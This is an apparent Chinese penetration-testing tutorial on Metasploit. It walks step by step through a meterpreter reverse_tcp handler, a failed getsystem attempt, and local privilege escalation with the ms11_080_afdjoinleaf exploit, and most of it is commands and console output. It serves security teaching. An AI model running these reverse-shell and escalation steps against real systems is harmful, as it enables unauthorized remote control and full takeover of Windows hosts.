【渗透测试】-工具之MSF

0x01:msf

msf是一款漏洞利用平台的工具

0x02:使用msf提权

生成反弹执行文件或脚本

加载msf,监听反弹结果

use exploit/multi/handler 设置接收反弹模块

set payload windows/meterpreter/reverse_tcp 设置反弹结果处理载荷

show options 查看配置选项

Show targets 查看攻击目标

set LHOST 192.168.1.111 设置本地监听地址192.168.1.111

exploit 执行

接收反弹,进行提权操作

meterpreter > getuid (获取当前权限)

Server username: NT AUTHORITY\NETWORK SERVICE

meterpreter > getsystem (尝试提权操作)

[-]priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:

[-]Named PipeImpersonation(In Memory/Admin)

[-]Named PipeImpersonation(Dropper/Admin)

[-]TokenDuplication(In Memory/Admin)

meterpreter > background (返回 选择提权exp)

[*]Backgrounding session1...

msfexploit(handler)> use exploit/windows/local/ms11_080_afdjoinleaf(选择提权exp)

msfexploit(ms11_080_afdjoinleaf)> set session1(载入当前反弹shell)

session =>1

msfexploit(ms11_080_afdjoinleaf)> exploit (执行)

你可能感兴趣的:(【渗透测试】-工具之MSF)